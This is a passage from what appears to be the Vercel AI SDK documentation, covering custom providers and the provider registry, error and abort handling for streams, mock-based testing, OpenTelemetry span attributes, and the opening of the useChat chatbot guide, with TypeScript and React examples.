middleware: yourLogMiddleware,
}),
prompt: 'Invent a new holiday and describe its traditions.',
providerOptions: {
yourLogMiddleware: {
hello: 'world',
},
},
});
console.log(text);
title: Provider & Model Management description: Learn how to work with multiple providers and models
Provider & Model Management
When you work with multiple providers and models, it is often desirable to manage them in a central place and access the models through simple string ids.
The AI SDK offers custom providers and a provider registry for this purpose:
- With custom providers, you can pre-configure model settings, provide model name aliases, and limit the available models.
- The provider registry lets you mix multiple providers and access them through simple string ids.
You can mix and match custom providers, the provider registry, and middleware in your application.
Custom Providers
You can create a custom provider using customProvider.
Example: custom model settings
You might want to override the default model settings for a provider or provide model name aliases with pre-configured settings.
import {
gateway,
customProvider,
defaultSettingsMiddleware,
wrapLanguageModel,
} from 'ai';
// custom provider with different provider options:
export const openai = customProvider({
languageModels: {
// replacement model with custom provider options:
'gpt-5.1': wrapLanguageModel({
model: gateway('openai/gpt-5.1'),
middleware: defaultSettingsMiddleware({
settings: {
providerOptions: {
openai: {
reasoningEffort: 'high',
},
},
},
}),
}),
// alias model with custom provider options:
'gpt-5.1-high-reasoning': wrapLanguageModel({
model: gateway('openai/gpt-5.1'),
middleware: defaultSettingsMiddleware({
settings: {
providerOptions: {
openai: {
reasoningEffort: 'high',
},
},
},
}),
}),
},
fallbackProvider: gateway,
});
Example: model name alias
You can also provide model name aliases, so you can update the model version in one place in the future:
import { customProvider, gateway } from 'ai';
// custom provider with alias names:
export const anthropic = customProvider({
languageModels: {
opus: gateway('anthropic/claude-opus-4.1'),
sonnet: gateway('anthropic/claude-sonnet-4.5'),
haiku: gateway('anthropic/claude-haiku-4.5'),
},
fallbackProvider: gateway,
});
Example: limit available models
You can limit the available models in the system, even if you have multiple providers.
import {
customProvider,
defaultSettingsMiddleware,
wrapLanguageModel,
gateway,
} from 'ai';
export const myProvider = customProvider({
languageModels: {
'text-medium': gateway('anthropic/claude-sonnet-4.5'),
'text-small': gateway('openai/gpt-5-mini'),
'reasoning-medium': wrapLanguageModel({
model: gateway('openai/gpt-5.1'),
middleware: defaultSettingsMiddleware({
settings: {
providerOptions: {
openai: {
reasoningEffort: 'high',
},
},
},
}),
}),
'reasoning-fast': wrapLanguageModel({
model: gateway('openai/gpt-5.1'),
middleware: defaultSettingsMiddleware({
settings: {
providerOptions: {
openai: {
reasoningEffort: 'low',
},
},
},
}),
}),
},
embeddingModels: {
embedding: gateway.textEmbeddingModel('openai/text-embedding-3-small'),
},
// no fallback provider
});
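Application code then refers only to these ids; a usage sketch (the './provider' import path is hypothetical):
import { generateText } from 'ai';
import { myProvider } from './provider';
const { text } = await generateText({
  model: myProvider.languageModel('reasoning-medium'),
  prompt: 'Invent a new holiday and describe its traditions.',
});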
Provider Registry
You can create a provider registry with multiple providers and models using createProviderRegistry.
Setup
import { anthropic } from '@ai-sdk/anthropic';
import { openai } from '@ai-sdk/openai';
import { createProviderRegistry, gateway } from 'ai';
export const registry = createProviderRegistry({
// register provider with prefix and default setup using gateway:
gateway,
// register provider with prefix and direct provider import:
anthropic,
openai,
});
Setup with Custom Separator
By default, the registry uses : as the separator between provider and model IDs. You can customize this separator:
import { anthropic } from '@ai-sdk/anthropic';
import { openai } from '@ai-sdk/openai';
import { createProviderRegistry, gateway } from 'ai';
export const customSeparatorRegistry = createProviderRegistry(
{
gateway,
anthropic,
openai,
},
{ separator: ' > ' },
);
Example: Use language models
You can access language models by using the languageModel method on the registry.
The provider id will become the prefix of the model id: providerId:modelId.
import { generateText } from 'ai';
import { registry } from './registry';
const { text } = await generateText({
model: registry.languageModel('openai:gpt-5.1'), // default separator
// or with custom separator:
// model: customSeparatorRegistry.languageModel('openai > gpt-5.1'),
prompt: 'Invent a new holiday and describe its traditions.',
});
Example: Use text embedding models
You can access text embedding models by using the textEmbeddingModel method on the registry.
The provider id will become the prefix of the model id: providerId:modelId.
import { embed } from 'ai';
import { registry } from './registry';
const { embedding } = await embed({
model: registry.textEmbeddingModel('openai:text-embedding-3-small'),
value: 'sunny day at the beach',
});
Example: Use image models
You can access image models by using the imageModel method on the registry.
The provider id will become the prefix of the model id: providerId:modelId.
import { generateImage } from 'ai';
import { registry } from './registry';
const { image } = await generateImage({
model: registry.imageModel('openai:dall-e-3'),
prompt: 'A beautiful sunset over a calm ocean',
});
Combining Custom Providers, Provider Registry, and Middleware
The central idea of provider management is to set up a file that contains all the providers and models you want to use. You may want to pre-configure model settings, provide model name aliases, limit the available models, and more.
Here is an example that implements the following concepts:
- pass through `gateway` with a namespace prefix (here: `gateway > *`)
- pass through a full provider with a namespace prefix (here: `xai > *`)
- set up an OpenAI-compatible provider with custom API key and base URL (here: `custom > *`)
- set up model name aliases (here: `anthropic > fast`, `anthropic > writing`, `anthropic > reasoning`)
- pre-configure model settings (here: `anthropic > reasoning`)
- validate the provider-specific options (here: `AnthropicProviderOptions`)
- use a fallback provider (here: `anthropic > *`)
- limit a provider to certain models without a fallback (here: `groq > gemma2-9b-it`, `groq > qwen-qwq-32b`)
- define a custom separator for the provider registry (here: `>`)
import { anthropic, AnthropicProviderOptions } from '@ai-sdk/anthropic';
import { createOpenAICompatible } from '@ai-sdk/openai-compatible';
import { xai } from '@ai-sdk/xai';
import { groq } from '@ai-sdk/groq';
import {
createProviderRegistry,
customProvider,
defaultSettingsMiddleware,
gateway,
wrapLanguageModel,
} from 'ai';
export const registry = createProviderRegistry(
{
// pass through gateway with a namespace prefix
gateway,
// pass through full providers with namespace prefixes
xai,
// access an OpenAI-compatible provider with custom setup
custom: createOpenAICompatible({
name: 'provider-name',
apiKey: process.env.CUSTOM_API_KEY,
baseURL: 'https://api.custom.com/v1',
}),
// setup model name aliases
anthropic: customProvider({
languageModels: {
fast: anthropic('claude-haiku-4-5'),
// simple model
writing: anthropic('claude-sonnet-4-5'),
// extended reasoning model configuration:
reasoning: wrapLanguageModel({
model: anthropic('claude-sonnet-4-5'),
middleware: defaultSettingsMiddleware({
settings: {
maxOutputTokens: 100000, // example default setting
providerOptions: {
anthropic: {
thinking: {
type: 'enabled',
budgetTokens: 32000,
},
} satisfies AnthropicProviderOptions,
},
},
}),
}),
},
fallbackProvider: anthropic,
}),
// limit a provider to certain models without a fallback
groq: customProvider({
languageModels: {
'gemma2-9b-it': groq('gemma2-9b-it'),
'qwen-qwq-32b': groq('qwen-qwq-32b'),
},
}),
},
{ separator: ' > ' },
);
// usage:
const model = registry.languageModel('anthropic > reasoning');
Global Provider Configuration
AI SDK 5 includes a global provider feature that allows you to specify a model using just a plain model ID string:
import { streamText } from 'ai';
__PROVIDER_IMPORT__;
const result = await streamText({
model: __MODEL__, // Uses the global provider (defaults to gateway)
prompt: 'Invent a new holiday and describe its traditions.',
});
By default, the global provider is set to the Vercel AI Gateway.
Customizing the Global Provider
You can set your own preferred global provider:
import { openai } from '@ai-sdk/openai';
// Initialize once during startup:
globalThis.AI_SDK_DEFAULT_PROVIDER = openai;
import { streamText } from 'ai';
const result = await streamText({
model: 'gpt-5.1', // Uses OpenAI provider without prefix
prompt: 'Invent a new holiday and describe its traditions.',
});
This simplifies provider usage and makes it easier to switch between providers without changing your model references throughout your codebase.
title: Error Handling description: Learn how to handle errors in the AI SDK Core
Error Handling
Handling regular errors
Regular errors are thrown and can be handled using the try/catch block.
import { generateText } from 'ai';
__PROVIDER_IMPORT__;
try {
const { text } = await generateText({
model: __MODEL__,
prompt: 'Write a vegetarian lasagna recipe for 4 people.',
});
} catch (error) {
// handle error
}
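Inside the catch block, you can narrow the error with the AI SDK's error classes; a sketch using `APICallError` (one of the exported error types):
import { APICallError } from 'ai';
function handleError(error: unknown) {
  if (APICallError.isInstance(error)) {
    // the provider API call itself failed (e.g. auth or rate limit)
    console.error('API call failed:', error.message);
  } else {
    console.error('Unknown error:', error);
  }
}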
See Error Types for more information on the different types of errors that may be thrown.
Handling streaming errors (simple streams)
When errors occur during streams that do not support error chunks,
the error is thrown as a regular error.
You can handle these errors using the try/catch block.
import { streamText } from 'ai';
__PROVIDER_IMPORT__;
try {
const { textStream } = streamText({
model: __MODEL__,
prompt: 'Write a vegetarian lasagna recipe for 4 people.',
});
for await (const textPart of textStream) {
process.stdout.write(textPart);
}
} catch (error) {
// handle error
}
Handling streaming errors (streaming with error support)
Full streams support error parts. You can handle those parts similar to other parts. It is recommended to also add a try-catch block for errors that happen outside of streaming.
import { streamText } from 'ai';
__PROVIDER_IMPORT__;
try {
const { fullStream } = streamText({
model: __MODEL__,
prompt: 'Write a vegetarian lasagna recipe for 4 people.',
});
for await (const part of fullStream) {
switch (part.type) {
// ... handle other part types
case 'error': {
const error = part.error;
// handle error
break;
}
case 'abort': {
// handle stream abort
break;
}
case 'tool-error': {
const error = part.error;
// handle error
break;
}
}
}
} catch (error) {
// handle error
}
Handling stream aborts
When streams are aborted (e.g., via chat stop button), you may want to perform cleanup operations like updating stored messages in your UI. Use the onAbort callback to handle these cases.
The onAbort callback is called when a stream is aborted via AbortSignal, but onFinish is not called. This ensures you can still update your UI state appropriately.
import { streamText } from 'ai';
__PROVIDER_IMPORT__;
const { textStream } = streamText({
model: __MODEL__,
prompt: 'Write a vegetarian lasagna recipe for 4 people.',
onAbort: ({ steps }) => {
// Update stored messages or perform cleanup
console.log('Stream aborted after', steps.length, 'steps');
},
onFinish: ({ steps, totalUsage }) => {
// This is called on normal completion
console.log('Stream completed normally');
},
});
for await (const textPart of textStream) {
process.stdout.write(textPart);
}
The onAbort callback receives:
steps: An array of all completed steps before the abort
You can also handle abort events directly in the stream:
import { streamText } from 'ai';
__PROVIDER_IMPORT__;
const { fullStream } = streamText({
model: __MODEL__,
prompt: 'Write a vegetarian lasagna recipe for 4 people.',
});
for await (const chunk of fullStream) {
switch (chunk.type) {
case 'abort': {
// Handle abort directly in stream
console.log('Stream was aborted');
break;
}
// ... handle other part types
}
}
title: Testing description: Learn how to use AI SDK Core mock providers for testing.
Testing
Testing language models can be challenging, because they are non-deterministic and calling them is slow and expensive.
To enable you to unit test your code that uses the AI SDK, the AI SDK Core
includes mock providers and test helpers. You can import the following helpers from ai/test:
- `MockEmbeddingModelV2`: A mock embedding model using the embedding model v2 specification.
- `MockLanguageModelV2`: A mock language model using the language model v2 specification.
- `mockId`: Provides an incrementing integer ID.
- `mockValues`: Iterates over an array of values with each call. Returns the last value when the array is exhausted.
- `simulateReadableStream`: Simulates a readable stream with delays.
With mock providers and test helpers, you can control the output of the AI SDK and test your code in a repeatable and deterministic way without actually calling a language model provider.
Examples
You can use the test helpers with the AI Core functions in your unit tests:
generateText
import { generateText } from 'ai';
import { MockLanguageModelV2 } from 'ai/test';
const result = await generateText({
model: new MockLanguageModelV2({
doGenerate: async () => ({
finishReason: 'stop',
usage: { inputTokens: 10, outputTokens: 20, totalTokens: 30 },
content: [{ type: 'text', text: `Hello, world!` }],
warnings: [],
}),
}),
prompt: 'Hello, test!',
});
streamText
import { streamText, simulateReadableStream } from 'ai';
import { MockLanguageModelV2 } from 'ai/test';
const result = streamText({
model: new MockLanguageModelV2({
doStream: async () => ({
stream: simulateReadableStream({
chunks: [
{ type: 'text-start', id: 'text-1' },
{ type: 'text-delta', id: 'text-1', delta: 'Hello' },
{ type: 'text-delta', id: 'text-1', delta: ', ' },
{ type: 'text-delta', id: 'text-1', delta: 'world!' },
{ type: 'text-end', id: 'text-1' },
{
type: 'finish',
finishReason: 'stop',
logprobs: undefined,
usage: { inputTokens: 3, outputTokens: 10, totalTokens: 13 },
},
],
}),
}),
}),
prompt: 'Hello, test!',
});
generateObject
import { generateObject } from 'ai';
import { MockLanguageModelV2 } from 'ai/test';
import { z } from 'zod';
const result = await generateObject({
model: new MockLanguageModelV2({
doGenerate: async () => ({
finishReason: 'stop',
usage: { inputTokens: 10, outputTokens: 20, totalTokens: 30 },
content: [{ type: 'text', text: `{"content":"Hello, world!"}` }],
warnings: [],
}),
}),
schema: z.object({ content: z.string() }),
prompt: 'Hello, test!',
});
streamObject
import { streamObject, simulateReadableStream } from 'ai';
import { MockLanguageModelV2 } from 'ai/test';
import { z } from 'zod';
const result = streamObject({
model: new MockLanguageModelV2({
doStream: async () => ({
stream: simulateReadableStream({
chunks: [
{ type: 'text-start', id: 'text-1' },
{ type: 'text-delta', id: 'text-1', delta: '{ ' },
{ type: 'text-delta', id: 'text-1', delta: '"content": ' },
{ type: 'text-delta', id: 'text-1', delta: `"Hello, ` },
{ type: 'text-delta', id: 'text-1', delta: `world` },
{ type: 'text-delta', id: 'text-1', delta: `!"` },
{ type: 'text-delta', id: 'text-1', delta: ' }' },
{ type: 'text-end', id: 'text-1' },
{
type: 'finish',
finishReason: 'stop',
logprobs: undefined,
usage: { inputTokens: 3, outputTokens: 10, totalTokens: 13 },
},
],
}),
}),
}),
schema: z.object({ content: z.string() }),
prompt: 'Hello, test!',
});
Simulate UI Message Stream Responses
You can also simulate UI Message Stream responses for testing, debugging, or demonstration purposes.
Here is a Next.js example:
import { simulateReadableStream } from 'ai';
export async function POST(req: Request) {
return new Response(
simulateReadableStream({
initialDelayInMs: 1000, // Delay before the first chunk
chunkDelayInMs: 300, // Delay between chunks
chunks: [
`data: {"type":"start","messageId":"msg-123"}\n\n`,
`data: {"type":"text-start","id":"text-1"}\n\n`,
`data: {"type":"text-delta","id":"text-1","delta":"This"}\n\n`,
`data: {"type":"text-delta","id":"text-1","delta":" is an"}\n\n`,
`data: {"type":"text-delta","id":"text-1","delta":" example."}\n\n`,
`data: {"type":"text-end","id":"text-1"}\n\n`,
`data: {"type":"finish"}\n\n`,
`data: [DONE]\n\n`,
],
}).pipeThrough(new TextEncoderStream()),
{
status: 200,
headers: {
'Content-Type': 'text/event-stream',
'Cache-Control': 'no-cache',
Connection: 'keep-alive',
'x-vercel-ai-ui-message-stream': 'v1',
},
},
);
}
title: Telemetry description: Using OpenTelemetry with AI SDK Core
Telemetry
The AI SDK uses OpenTelemetry to collect telemetry data. OpenTelemetry is an open-source observability framework designed to provide standardized instrumentation for collecting telemetry data.
Check out the AI SDK Observability Integrations to see providers that offer monitoring and tracing for AI SDK applications.
Enabling telemetry
For Next.js applications, please follow the Next.js OpenTelemetry guide to enable telemetry first.
You can then use the experimental_telemetry option to enable telemetry on specific function calls while the feature is experimental:
const result = await generateText({
model: __MODEL__,
prompt: 'Write a short story about a cat.',
experimental_telemetry: { isEnabled: true },
});
When telemetry is enabled, you can also control if you want to record the input values and the output values for the function.
By default, both are enabled. You can disable them by setting the recordInputs and recordOutputs options to false.
Disabling the recording of inputs and outputs can be useful for privacy, data transfer, and performance reasons. You might for example want to disable recording inputs if they contain sensitive information.
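For example, to keep telemetry enabled while omitting inputs and outputs:
const result = await generateText({
  model: __MODEL__,
  prompt: 'Write a short story about a cat.',
  experimental_telemetry: {
    isEnabled: true,
    recordInputs: false,
    recordOutputs: false,
  },
});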
Telemetry Metadata
You can provide a functionId to identify the function that the telemetry data is for,
and metadata to include additional information in the telemetry data.
const result = await generateText({
model: __MODEL__,
prompt: 'Write a short story about a cat.',
experimental_telemetry: {
isEnabled: true,
functionId: 'my-awesome-function',
metadata: {
something: 'custom',
someOtherThing: 'other-value',
},
},
});
Custom Tracer
You may provide a tracer which must return an OpenTelemetry Tracer. This is useful in situations where
you want your traces to use a TracerProvider other than the one provided by the @opentelemetry/api singleton.
import { NodeTracerProvider } from '@opentelemetry/sdk-trace-node';
const tracerProvider = new NodeTracerProvider();
const result = await generateText({
model: __MODEL__,
prompt: 'Write a short story about a cat.',
experimental_telemetry: {
isEnabled: true,
tracer: tracerProvider.getTracer('ai'),
},
});
Collected Data
generateText function
generateText records 3 types of spans:
- `ai.generateText` (span): the full length of the `generateText` call. It contains 1 or more `ai.generateText.doGenerate` spans. It contains the basic LLM span information and the following attributes:
  - `operation.name`: `ai.generateText` and the functionId that was set through `telemetry.functionId`
  - `ai.operationId`: `"ai.generateText"`
  - `ai.prompt`: the prompt that was used when calling `generateText`
  - `ai.response.text`: the text that was generated
  - `ai.response.toolCalls`: the tool calls that were made as part of the generation (stringified JSON)
  - `ai.response.finishReason`: the reason why the generation finished
  - `ai.settings.maxOutputTokens`: the maximum number of output tokens that were set
- `ai.generateText.doGenerate` (span): a provider doGenerate call. It can contain `ai.toolCall` spans. It contains the call LLM span information and the following attributes:
  - `operation.name`: `ai.generateText.doGenerate` and the functionId that was set through `telemetry.functionId`
  - `ai.operationId`: `"ai.generateText.doGenerate"`
  - `ai.prompt.messages`: the messages that were passed into the provider
  - `ai.prompt.tools`: array of stringified tool definitions. The tools can be of type `function` or `provider-defined-client`. Function tools have a `name`, `description` (optional), and `inputSchema` (JSON schema). Provider-defined-client tools have a `name`, `id`, and `input` (Record).
  - `ai.prompt.toolChoice`: the stringified tool choice setting (JSON). It has a `type` property (`auto`, `none`, `required`, `tool`), and if the type is `tool`, a `toolName` property with the specific tool.
  - `ai.response.text`: the text that was generated
  - `ai.response.toolCalls`: the tool calls that were made as part of the generation (stringified JSON)
  - `ai.response.finishReason`: the reason why the generation finished
- `ai.toolCall` (span): a tool call that is made as part of the `generateText` call. See Tool call spans for more details.
streamText function
streamText records 3 types of spans and 2 types of events:
- `ai.streamText` (span): the full length of the `streamText` call. It contains a `ai.streamText.doStream` span. It contains the basic LLM span information and the following attributes:
  - `operation.name`: `ai.streamText` and the functionId that was set through `telemetry.functionId`
  - `ai.operationId`: `"ai.streamText"`
  - `ai.prompt`: the prompt that was used when calling `streamText`
  - `ai.response.text`: the text that was generated
  - `ai.response.toolCalls`: the tool calls that were made as part of the generation (stringified JSON)
  - `ai.response.finishReason`: the reason why the generation finished
  - `ai.settings.maxOutputTokens`: the maximum number of output tokens that were set
- `ai.streamText.doStream` (span): a provider doStream call. This span contains an `ai.stream.firstChunk` event and `ai.toolCall` spans. It contains the call LLM span information and the following attributes:
  - `operation.name`: `ai.streamText.doStream` and the functionId that was set through `telemetry.functionId`
  - `ai.operationId`: `"ai.streamText.doStream"`
  - `ai.prompt.messages`: the messages that were passed into the provider
  - `ai.prompt.tools`: array of stringified tool definitions. The tools can be of type `function` or `provider-defined-client`. Function tools have a `name`, `description` (optional), and `inputSchema` (JSON schema). Provider-defined-client tools have a `name`, `id`, and `input` (Record).
  - `ai.prompt.toolChoice`: the stringified tool choice setting (JSON). It has a `type` property (`auto`, `none`, `required`, `tool`), and if the type is `tool`, a `toolName` property with the specific tool.
  - `ai.response.text`: the text that was generated
  - `ai.response.toolCalls`: the tool calls that were made as part of the generation (stringified JSON)
  - `ai.response.msToFirstChunk`: the time it took to receive the first chunk in milliseconds
  - `ai.response.msToFinish`: the time it took to receive the finish part of the LLM stream in milliseconds
  - `ai.response.avgCompletionTokensPerSecond`: the average number of completion tokens per second
  - `ai.response.finishReason`: the reason why the generation finished
- `ai.toolCall` (span): a tool call that is made as part of the `streamText` call. See Tool call spans for more details.
- `ai.stream.firstChunk` (event): an event that is emitted when the first chunk of the stream is received.
  - `ai.response.msToFirstChunk`: the time it took to receive the first chunk
- `ai.stream.finish` (event): an event that is emitted when the finish part of the LLM stream is received.
generateObject function
generateObject records 2 types of spans:
- `ai.generateObject` (span): the full length of the `generateObject` call. It contains 1 or more `ai.generateObject.doGenerate` spans. It contains the basic LLM span information and the following attributes:
  - `operation.name`: `ai.generateObject` and the functionId that was set through `telemetry.functionId`
  - `ai.operationId`: `"ai.generateObject"`
  - `ai.prompt`: the prompt that was used when calling `generateObject`
  - `ai.schema`: stringified JSON schema version of the schema that was passed into the `generateObject` function
  - `ai.schema.name`: the name of the schema that was passed into the `generateObject` function
  - `ai.schema.description`: the description of the schema that was passed into the `generateObject` function
  - `ai.response.object`: the object that was generated (stringified JSON)
  - `ai.settings.output`: the output type that was used, e.g. `object` or `no-schema`
- `ai.generateObject.doGenerate` (span): a provider doGenerate call. It contains the call LLM span information and the following attributes:
  - `operation.name`: `ai.generateObject.doGenerate` and the functionId that was set through `telemetry.functionId`
  - `ai.operationId`: `"ai.generateObject.doGenerate"`
  - `ai.prompt.messages`: the messages that were passed into the provider
  - `ai.response.object`: the object that was generated (stringified JSON)
  - `ai.response.finishReason`: the reason why the generation finished
streamObject function
streamObject records 2 types of spans and 1 type of event:
- `ai.streamObject` (span): the full length of the `streamObject` call. It contains 1 or more `ai.streamObject.doStream` spans. It contains the basic LLM span information and the following attributes:
  - `operation.name`: `ai.streamObject` and the functionId that was set through `telemetry.functionId`
  - `ai.operationId`: `"ai.streamObject"`
  - `ai.prompt`: the prompt that was used when calling `streamObject`
  - `ai.schema`: stringified JSON schema version of the schema that was passed into the `streamObject` function
  - `ai.schema.name`: the name of the schema that was passed into the `streamObject` function
  - `ai.schema.description`: the description of the schema that was passed into the `streamObject` function
  - `ai.response.object`: the object that was generated (stringified JSON)
  - `ai.settings.output`: the output type that was used, e.g. `object` or `no-schema`
- `ai.streamObject.doStream` (span): a provider doStream call. This span contains an `ai.stream.firstChunk` event. It contains the call LLM span information and the following attributes:
  - `operation.name`: `ai.streamObject.doStream` and the functionId that was set through `telemetry.functionId`
  - `ai.operationId`: `"ai.streamObject.doStream"`
  - `ai.prompt.messages`: the messages that were passed into the provider
  - `ai.response.object`: the object that was generated (stringified JSON)
  - `ai.response.msToFirstChunk`: the time it took to receive the first chunk
  - `ai.response.finishReason`: the reason why the generation finished
- `ai.stream.firstChunk` (event): an event that is emitted when the first chunk of the stream is received.
  - `ai.response.msToFirstChunk`: the time it took to receive the first chunk
embed function
embed records 2 types of spans:
- `ai.embed` (span): the full length of the `embed` call. It contains 1 `ai.embed.doEmbed` span. It contains the basic embedding span information and the following attributes:
  - `operation.name`: `ai.embed` and the functionId that was set through `telemetry.functionId`
  - `ai.operationId`: `"ai.embed"`
  - `ai.value`: the value that was passed into the `embed` function
  - `ai.embedding`: a JSON-stringified embedding
- `ai.embed.doEmbed` (span): a provider doEmbed call. It contains the basic embedding span information and the following attributes:
  - `operation.name`: `ai.embed.doEmbed` and the functionId that was set through `telemetry.functionId`
  - `ai.operationId`: `"ai.embed.doEmbed"`
  - `ai.values`: the values that were passed into the provider (array)
  - `ai.embeddings`: an array of JSON-stringified embeddings
embedMany function
embedMany records 2 types of spans:
- `ai.embedMany` (span): the full length of the `embedMany` call. It contains 1 or more `ai.embedMany.doEmbed` spans. It contains the basic embedding span information and the following attributes:
  - `operation.name`: `ai.embedMany` and the functionId that was set through `telemetry.functionId`
  - `ai.operationId`: `"ai.embedMany"`
  - `ai.values`: the values that were passed into the `embedMany` function
  - `ai.embeddings`: an array of JSON-stringified embeddings
- `ai.embedMany.doEmbed` (span): a provider doEmbed call. It contains the basic embedding span information and the following attributes:
  - `operation.name`: `ai.embedMany.doEmbed` and the functionId that was set through `telemetry.functionId`
  - `ai.operationId`: `"ai.embedMany.doEmbed"`
  - `ai.values`: the values that were sent to the provider
  - `ai.embeddings`: an array of JSON-stringified embeddings for each value
Span Details
Basic LLM span information
Many spans that use LLMs (ai.generateText, ai.generateText.doGenerate, ai.streamText, ai.streamText.doStream,
ai.generateObject, ai.generateObject.doGenerate, ai.streamObject, ai.streamObject.doStream) contain the following attributes:
- `resource.name`: the functionId that was set through `telemetry.functionId`
- `ai.model.id`: the id of the model
- `ai.model.provider`: the provider of the model
- `ai.request.headers.*`: the request headers that were passed in through `headers`
- `ai.response.providerMetadata`: provider specific metadata returned with the generation response
- `ai.settings.maxRetries`: the maximum number of retries that were set
- `ai.telemetry.functionId`: the functionId that was set through `telemetry.functionId`
- `ai.telemetry.metadata.*`: the metadata that was passed in through `telemetry.metadata`
- `ai.usage.completionTokens`: the number of completion tokens that were used
- `ai.usage.promptTokens`: the number of prompt tokens that were used
Call LLM span information
Spans that correspond to individual LLM calls (ai.generateText.doGenerate, ai.streamText.doStream, ai.generateObject.doGenerate, ai.streamObject.doStream) contain
basic LLM span information and the following attributes:
- `ai.response.model`: the model that was used to generate the response. This can be different from the model that was requested if the provider supports aliases.
- `ai.response.id`: the id of the response. Uses the ID from the provider when available.
- `ai.response.timestamp`: the timestamp of the response. Uses the timestamp from the provider when available.
- Semantic Conventions for GenAI operations:
  - `gen_ai.system`: the provider that was used
  - `gen_ai.request.model`: the model that was requested
  - `gen_ai.request.temperature`: the temperature that was set
  - `gen_ai.request.max_tokens`: the maximum number of tokens that were set
  - `gen_ai.request.frequency_penalty`: the frequency penalty that was set
  - `gen_ai.request.presence_penalty`: the presence penalty that was set
  - `gen_ai.request.top_k`: the topK parameter value that was set
  - `gen_ai.request.top_p`: the topP parameter value that was set
  - `gen_ai.request.stop_sequences`: the stop sequences
  - `gen_ai.response.finish_reasons`: the finish reasons that were returned by the provider
  - `gen_ai.response.model`: the model that was used to generate the response. This can be different from the model that was requested if the provider supports aliases.
  - `gen_ai.response.id`: the id of the response. Uses the ID from the provider when available.
  - `gen_ai.usage.input_tokens`: the number of prompt tokens that were used
  - `gen_ai.usage.output_tokens`: the number of completion tokens that were used
Basic embedding span information
Many spans that use embedding models (ai.embed, ai.embed.doEmbed, ai.embedMany, ai.embedMany.doEmbed) contain the following attributes:
- `ai.model.id`: the id of the model
- `ai.model.provider`: the provider of the model
- `ai.request.headers.*`: the request headers that were passed in through `headers`
- `ai.settings.maxRetries`: the maximum number of retries that were set
- `ai.telemetry.functionId`: the functionId that was set through `telemetry.functionId`
- `ai.telemetry.metadata.*`: the metadata that was passed in through `telemetry.metadata`
- `ai.usage.tokens`: the number of tokens that were used
- `resource.name`: the functionId that was set through `telemetry.functionId`
Tool call spans
Tool call spans (ai.toolCall) contain the following attributes:
- `operation.name`: `"ai.toolCall"`
- `ai.operationId`: `"ai.toolCall"`
- `ai.toolCall.name`: the name of the tool
- `ai.toolCall.id`: the id of the tool call
- `ai.toolCall.args`: the input parameters of the tool call
- `ai.toolCall.result`: the output result of the tool call. Only available if the tool call is successful and the result is serializable.
title: Overview description: An overview of AI SDK UI.
AI SDK UI
AI SDK UI is designed to help you build interactive chat, completion, and assistant applications with ease. It is a framework-agnostic toolkit, streamlining the integration of advanced AI functionalities into your applications.
AI SDK UI provides robust abstractions that simplify the complex tasks of managing chat streams and UI updates on the frontend, enabling you to develop dynamic AI-driven interfaces more efficiently. With three main hooks — useChat, useCompletion, and useObject — you can incorporate real-time chat capabilities, text completions, streamed JSON, and interactive assistant features into your app.
- `useChat` offers real-time streaming of chat messages, abstracting state management for inputs, messages, loading, and errors, allowing for seamless integration into any UI design.
- `useCompletion` enables you to handle text completions in your applications, managing the prompt input and automatically updating the UI as new completions are streamed.
- `useObject` is a hook that allows you to consume streamed JSON objects, providing a simple way to handle and display structured data in your application.
These hooks are designed to reduce the complexity and time required to implement AI interactions, letting you focus on creating exceptional user experiences.
UI Framework Support
AI SDK UI supports the following frameworks: React, Svelte, Vue.js, and Angular. Here is a comparison of the supported functions across these frameworks:
| Function | React | Svelte | Vue.js | Angular |
|---|---|---|---|---|
| useChat | useChat | Chat | useChat | Chat |
| useCompletion | useCompletion | Completion | useCompletion | Completion |
| useObject | useObject | StructuredObject | useObject | StructuredObject |
Framework Examples
Explore these example implementations for different frameworks:
API Reference
Please check out the AI SDK UI API Reference for more details on each function.
title: Chatbot description: Learn how to use the useChat hook.
Chatbot
The useChat hook makes it effortless to create a conversational user interface for your chatbot application. It enables the streaming of chat messages from your AI provider, manages the chat state, and updates the UI automatically as new messages arrive.
To summarize, the useChat hook provides the following features:
- Message Streaming: All the messages from the AI provider are streamed to the chat UI in real-time.
- Managed States: The hook manages the states for input, messages, status, error and more for you.
- Seamless Integration: Easily integrate your chat AI into any design or layout with minimal effort.
In this guide, you will learn how to use the useChat hook to create a chatbot application with real-time message streaming.
Check out our chatbot with tools guide to learn how to use tools in your chatbot.
Let's start with the following example first.
Example
'use client';
import { useChat } from '@ai-sdk/react';
import { DefaultChatTransport } from 'ai';
import { useState } from 'react';
export default function Page() {
const { messages, sendMessage, status } = useChat({
transport: new DefaultChatTransport({
api: '/api/chat',
}),
});
const [input, setInput] = useState('');
return (
<>
{messages.map(message => (
<div key={message.id}>
{message.role === 'user' ? 'User: ' : 'AI: '}
{message.parts.map((part, index) =>
part.type === 'text' ? <span key={index}>{part.text}</span> : null,
)}
</div>
))}
<form
onSubmit={e => {
e.preventDefault();
if (input.trim()) {
sendMessage({ text: input });
setInput('');
}
}}
>
<input
value={input}
onChange={e => setInput(e.target.value)}
disabled={status !== 'ready'}
placeholder="Say something..."
/>
<button type="submit" disabled={status !== 'ready'}>
Submit
</button>
</form>
</>
);
}
import { convertToModelMessages, streamText, UIMessage } from 'ai';
__PROVIDER_IMPORT__;
// Allow streaming responses up to 30 seconds
export const maxDuration = 30;
export async function POST(req: Request) {
const { messages }: { messages: UIMessage[] } = await req.json();
const result = streamText({
model: __MODEL__,
system: 'You are a helpful assistant.',
messages: convertToModelMessages(messages),
});
return result.toUIMessageStreamResponse();
}
In the Page component, the useChat hook will send a request to your AI provider endpoint whenever the user sends a message using sendMessage.
The messages are then streamed back in real-time and displayed in the chat UI.
This enables a seamless chat experience where the user can see the AI response as soon as it is available, without having to wait for the entire response to be received.
Customized UI
useChat also provides ways to manage the chat message states via code, show status, and update messages without being triggered by user interactions.
Status
The useChat hook returns a status. It has the following possible values:
- `submitted`: The message has been sent to the API and we're awaiting the start of the response stream.
- `streaming`: The response is actively streaming in from the API, receiving chunks of data.
- `ready`: The full response has been received and processed; a new user message can be submitted.
- `error`: An error occurred during the API request, preventing successful completion.
You can use the status for purposes such as the following:
- To show a loading spinner while the chatbot is processing the user's message.
- To show a "Stop" button to abort the current message.
- To disable the submit button.
'use client';
import { useChat } from '@ai-sdk/react';
import { DefaultChatTransport } from 'ai';
import { useState } from 'react';
export default function Page() {
const { messages, sendMessage, status, stop } = useChat({
transport: new DefaultChatTransport({
api: '/api/chat',
}),
});
const [input, setInput] = useState('');
return (
<>
{messages.map(message => (
<div key={message.id}>
